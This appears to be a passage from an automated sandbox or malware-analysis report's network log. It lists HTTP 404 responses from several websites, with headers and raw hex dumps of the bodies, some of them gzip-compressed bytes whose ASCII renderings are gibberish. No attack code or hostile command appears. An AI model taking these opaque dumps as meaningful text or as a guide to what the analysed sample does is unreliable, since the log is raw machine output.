71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 49 73 6d 61 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 63 73 73 2f 63 75 73 74 6f 6d 2f 6c 6f 61 64 65 72 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 6a 73 2f 63 6f 72 65 2f 73 63 72 69 70 74 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 76 65 6e 64 6f 72 73 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 75 69 2f 70 72 69 73 6d 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 65 78 74 65 6e 73 69 6f 6e 73 2f 73 77 65 65 74 61 6c 65 72 74 32 2e 6d 69 6e 2e 63 73 73 22 3e 0d 0a 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://oceanictrailers.com.au/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 22 Dec 2023 20:15:01 GMTData Raw: 31 31 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 5b 6d 73 db b6 b2 fe 1c cf f4 3f d0 cc 54 21 1b 90 22 a9 57 53 51 3a e7 a4 e9 9d 73 a7 bd 39 d3 34 73 3f c4 9d 0c 44 2e 25 26 14 c1 02 a0 25 1f 55 ff fd 0e 00 be 89 a2 2c c5 4e af 27 b1 2d 70 f1 3c 8b c5 ee 02 58 d0 af ae 43 12 f0 fb 0c b4 15 5f 27 af bf bb 7a 25 7e 6a 09 4e 97 73 1d 52 eb c3 7b fd f5 77 57 a2 19 70 f8 fa bb ab 67 af d6 c0 b1 16 ac 30 65 c0 e7 fa 87 df 7f b6 a6 42 a4 78 90 e2 35 cc f5 bb 18 36 19 a1 5c d7 02 92 72 48 f9 5c df c4 21 5f cd 43 b8 8b 03 b0 e4 07 a4 c5 69 cc 63 9c 58 2c c0 09 cc 5d 05 93 c4 e9 17 8d 42 32 d7 33 4a a2 38 01 5d 5b 51 88 e6 fa 8a f3 8c f9 fd fe 72 9d 2d 6d 42 97 fd 6d 94 f6 5d d9 4b d0 f3 98 27 f0 fa df 78 09 5a 4a b8 16 91 3c 0d b5 de f3 a9 e7 ba 33 ed 5d 00 38 8d 03 ed 77 8a e3 04 28 7b d5 57 e2 57 6a 38 52 eb 17 94 2c 08 67 2f 2a 9d 5f ac f1 d6 8a d7 78 09 56 46 41 8c c9 4f 30 5d c2 0b ad ff fa ea 55 ad 27 4e 38 d0 14 73 d0 35 61 c9 b9 8e b3 2c 89 03 cc 63 92 f6 29 63 2f b7 eb 44 d7 24 e1 5c 6f 6b a2 f5 28 fe 33 27 33 ed 67 80 b0 3d 54 a2 d4 e6 85 d6 76 40 d6 36 ce fb 11 40 d8 d7 ff 16 2d de 90 f5 1a 52 ce be 46 9d a0 e8 d3 d4 8b 05 34 ce f8 eb ab 4d 9c 86 64 63 7f da 64 b0 26 9f e3 f7 c0 79 9c 2e 99 36 d7 76 fa 02 33 f8 40 13 dd 2f a6 f6 b6 7f db 67 f6 46 cc ed 6d 5f da 9d dd f6 03 42 e1 b6 2f 3b df f6 dd a1 ed d8 ce 6d 7f e2 6d 27 de 6d 5f 47 3a 6c b9 ee eb 76 96 2e 75 a4 b3 bb e5 e3 f0 d8 dd 52 a2 b1 bb e5 5b 05 c8 ee 24 20 c9 69 00 ba bf d3 03 92 06 98 4b 35 0a 7d 7d a1 6e f7 04 dd f6 37 99 15 a7 41 92 87 c0 6e fb 9f 99 6c 90 9d 2d 0a 09 60 06 f6 3a 4e ed cf ec c7 3b a0 f3 b1 3d b4 3d 7d bf 9f 5d f5 7f b8 d6 7e 5f c5 4c 13 7e af c5 4c c3 39 27 d6 12 52 a0 98 43 a8 fd d0 bf ba 8e f2 34 10 9e 65 c4 28 35 77 77 98 6a 04 31 04 b3 b2 5d 0b 0c 30 77 9c de cb 67 7c be 63 79 26 62 f1 77 60 9c f9 80 78 bc 06 c6 f1 3a f3 8d 14 36 da 4f 98 83 69 df e1 24 87 77 91 61 ee 67 0c 18 8b 49 fa 9e 13 8a 97 60 33 e0 ff e2 b0 36 08 fa ef f7 ef fe c7 66 9c c6 e9 32 8e ee 0d 6e 9a fb 00 f3 60 25 e8 f6 fb 8a 3e 33 00 71 a1 1a d8 41 02 98 fe 06 01 37 1c e4 20 b0 03 9c de 61 66 ab e8 af 3e ae 20 5e ae b8 89 c0 8e e2 24 f9 1d b6 dc e0 c8 41 8e 39 13 83 e3 73 a1 e5 87 38 e5 03 ef 1f 94 e2 7b 03 ec 25 f0 7f 89 b0 fc 09 73 7c 09 b4 1d 62 8e 4d 44 e7 c6 13 74 4a a5 4e e8 5b 69 63 ce 28 f0 9c a6 1a b7 e1 0e e8 bd 51 1a 50 98 cf dc 15 0f 61 3e 9f d3 8f fc 8f bd 59 1b 38 2f 0d cc 36 b1 30 3f 37 77 01 66 a0 47 09 5e ea 7e d1 31 35 00 e9 b7 79 38 1d 04 b7 79 18 45 83 db 3c 02 27 ba cd 3d c7 09 6f 73 6f 8c 27 aa 45 3f 29 b6 38 10 33 7f bc 76 fd eb 43 d8 30 c2 15 45 18 0d 9a 50 f2 9
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:01 GMTServer: ApacheLast-Modified: Thu, 26 Jul 2007 15:09:38 GMTETag: "8d7ff8d4-2b5-4362c03e5f083"Accept-Ranges: bytesContent-Length: 693Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-127.ec2.internalX-Request-Id: 53bdf0ab-ffeb-4902-b52b-9b57e9f389acData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:01 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6f 6d 75 72 61 6d 62 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at omuramba.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jhCjrjWr%2FwTwmNwH87%2FdNBjREeiGfkQAqTB7udHieJw%2B2YZm1%2BM6iGgcpOzUipIsXzNxtK1vEDn1lGHoFjCBg%2B7w%2BNLERbF5FLKNyEVxD7uc9%2BQf0tgrpaehomKZNE5z"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08d138b521d9-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:15:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Mon, 16 Oct 2023 04:34:27 GMTETag: W/"400-607cdebea636c"Content-Encoding: gzipData Raw: 32 35 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b b4 24 a3 81 76 1d 4d c6 28 a5 0c 45 3e c5 22 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba de de de 2c 8a ea 7a 75 b9 e4 db 76 bd bd 59 2d 2e 3e 5e c0 0f 47 f0 dd 45 5b 57 f3 fc b2 a8 ae 2e 37 2b 68 3c aa 6f e5 1c bd 77 fe 4f ed 64 98 97 8b ea c3 74 fa a8 15 18 42 58 af e0 cb d3 a2 9a a7 c3 fc e1 11 6d ad d5 d3 74 ca e4 f3 a3 c8 d5 dd f2 21 49 9e 2f fe 11 e1 a7 62 db 20 78 fc 1b 31 10 d6 c0 e4 b1 45 4b d0 8b 00 96 ed a8 64 07 9c 05 6a 74 80 80 fe 19 fd ac a8 7e 26 ae 7b be 5c 2e 97 f7 ab cd 66 51 fc c6 1d 6c c6 cf 20 08 3a a9 98 29 cc a4 6b 67 cd 81 6d bc 9d 63 97 d9 ca 3c b7 50 a4 20 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d5 d2 bb e0 14 41 c3 66 44 5d b3 3f 01 d2 20 5b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 b5 25 f4 16 09 56 2f 9d 71 9e ad c2 5a b1 75 04 c2 17 02 a7 32 46 58 18 bb 3c 0b d0 62 08 62 8f c0 e1 4a 72 0e 42 2b 8c 29 27 10 3a 94 5a 69 c9 4f 43 06 19 3e c9 54 8c fd 7c fe 09 76 03 61 98 fc 2f c8 5d b2 1b 1b 32 46 53 00 d7 1f d5 4e 5a 33 78 70 11 24 13 a5 93 89 32 39 53 93 0c d9 45 02 4d ec ac 63 26 1a 80 bc 96 07 be 39 50 9a 27 11 7a 4d b2 61 b4 31 58 67 44 c9 9e 3d e5 44 27 8d 50 ce 60 9b 88 5b 14 96 7d 3a 05 d2 45 1f f0 a8 32 8a 86 86 eb 7e 87 03 e1 11 24 da c0 ed d5 9c 12 6a 54 22 1a 9a 65 ad f5 7a 03 c2 f4 62 08 a7 a0 ef f1 23 73 22 31 ce ee 33 08 ad 8b fb 26 45 68 c5 81 b7 f5 fd 90 78 be 5d 37 24 c3 98 01 bd f3 07 e1 c7 cd e3 b9 1c 8b 08 ba ed 0c 7e 85 4e d4 e3 44 c7 09 e6 f3 a7 21 72 37 0d af c8 4e ef 39 6d 3b ee b1 d1 ac 38 ee 2e cb 77 31 34 5c 6e 06 b9 b4 46 69 35 94 7e 46 68 78 cd 53 62 c1 1d 53 8f 86 5f 8d 23 86 56 5b dd c6 f6 98 ff ee ad c7 71 6e 3c 26 7c 11 92 cc 00 7d 6a 7b 70 f1 8c a3 7b 14 b5 3e a5 f7 7a df 10 ff 4b 7d a6 e0 9f f2 15 cf fd b9 60 00 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 25eeSk0_qK_n$vM(E>"I{2},zuvY-.>^GE[W.7+h<owOdtBXmt!I/b x1EKdjt~&{\.fQl :)kgmc<P LUSAfD]? [}E%%V/qZu2FX<bbJrB+)':ZiOC>T\|va/]2FSNZ3xp$29SEMc&9P'zMa1XgD=D'P`[}:E2~$jT"ezb#s"13&Ehx]7$~ND!r7N9m;8.w14\nFi5~FhxSbS_#V[qn<&\|}j{p{>zK}`0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-133.ec2.internalX-Request-Id: ee67862c-1b1d-49fa-a4cc-86f8dc818cd6Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-104.ec2.internalX-Request-Id: 92222c7b-4932-4e12-b201-6a772bc60704Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:01 GMTServer: ApacheUpgrade: h2Connection: UpgradeLast-Modified: Mon, 06 Jun 2005 08:43:43 GMTETag: "31a-3f8dbb37d6dc0;45d2231770ec0Accept-Ranges: bytesContent-Length: 794Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 2e 73 74 79 6c 65 33 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 43 43 30 30 30 30 3b 0a 7d 0a 2e 73 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 43 43 43 43 43 43 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 45 43 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 7d 0a 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 79 6c 65 33 22 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 38 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 34 36 30 22 3e 0a 3c 74 62 6f 64 79 3e 3c 74 72 3e 3c 74 64 20 63 6c 61 73 73 3d 22 73 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 62 6f 64 79 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>404 Not Found</title><style type="text/css"><!--.style3 { font-family: Verdana, Arial, Helvetica, sans-serif; color: #CC0000;}.s { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; font-weight: normal;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wakBVtdgS8tTa9vT8ho1O%2BL2qyuoaloitIk2hZp600niLHiLAvLydPvS%2FbIvPTkd54MLzQok%2B4jXmCrTAodXRdGVSPPZc7WVH4PG%2Bh1Fm9XKilS8XO0FVqqjM%2Bpr8ajJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08d4dab0961a-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:02 GMTServer: ApacheLast-Modified: Thu, 26 Jul 2007 15:09:38 GMTETag: "8d7ff8d4-2b5-4362c03e5f083"Accept-Ranges: bytesContent-Length: 693Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:02 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-53.ec2.internalX-Request-Id: aef648fa-24bf-4718-9d0a-f3ec1042a539Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 22 Dec 2023 20:15:01 GMTContent-Length: 4948Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 